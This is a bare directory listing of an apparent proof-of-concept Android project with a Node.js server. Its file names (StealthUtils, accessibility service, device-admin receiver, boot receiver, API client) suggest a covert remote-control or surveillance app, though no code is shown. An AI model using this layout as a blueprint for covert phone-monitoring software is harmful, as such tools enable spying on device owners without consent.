# supermap-fullstack

./: AndroidManifest.xml  deploy.sh
client/: build.gradle  settings.gradle
client/app/: build.gradle
client/app/src/main/: AndroidManifest.xml
client/app/src/main/java/com/lab/poc/full/: ApiClient.java  BootReceiver.java  MainActivity.java  MainService.java  MyAccessibilityService.java  MyDeviceAdminReceiver.java  PermissionsManager.java  StealthUtils.java
client/app/src/main/java/com/lab/poc/supermap/: ApiClient.java  BootReceiver.java  MainActivity.java  MainService.java  MyAccessibilityService.java  MyDeviceAdminReceiver.java
client/app/src/main/res/layout/: activity_main.xml
client/app/src/main/res/values/: strings.xml  styles.xml
client/app/src/main/res/xml/: accessibility_config.xml  device_admin_config.xml
server/: .gitignore  db.js  index.js  package.json  server.js
